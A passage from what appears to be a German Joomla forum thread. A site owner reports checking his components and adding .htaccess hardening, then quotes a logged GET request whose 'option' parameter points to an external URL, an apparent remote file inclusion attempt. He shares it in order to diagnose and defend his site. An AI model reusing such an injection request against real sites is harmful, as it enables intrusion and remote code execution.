Zitat:
Zitat von rickkp
Du wirst entweder unsichere Komponenten am laufen haben, die Rechte deiner Ordner und Dateien falsch gesetzt oder die allgemeinen Sicherheitsregeln zu register globals - magic quotes usw nicht beachtet haben.
|
Danke für die schnelle Antwort. Ich habe noch mal alles durchgecheckt und erst mal keine groben Schnitzer gefunden. Ich habe noch zusätzlich das
erweiterte .htaccess eingebaut, möglicherweise hilft es.
Zitat:
Zitat von rickkp
Schau dir meine Signatur an und dieses Forum Sicherheit.
Vergleiche die Komponenten mit deinen installierten und befolge die Sicherheitshinweise die hier empfohlen werden.
|
OK, die Links sind hilfreich, bisher konnte ich allerdings nichts relevantes finden. Die einzige verdächtige Komponente wäre vielleicht Exposé, die habe ich aber nach einem Angriff im letzten Jahr auf dem neuesten Stand.
Die logs zeigen einen verdächtigen Angriffsversuch, nämlich:
Code:
GET /index.php?option=http%3A%2F%2Fwww.nedkellypub.it%2Fconcerti%2Fdati%2Folukev%2Forawo%2F&task=view&id=19&Itemid=34
Auf welchen Exploit würde das deuten? Google hatte darauf keine Joomla bezügliche Antwort, die ich verstanden hätte. *grübel*
Bei dem Versuch diese URL einzugeben, kam dann auch die Meldung "Restricted Access"
Noch immer ein wenig unsicher... Peter
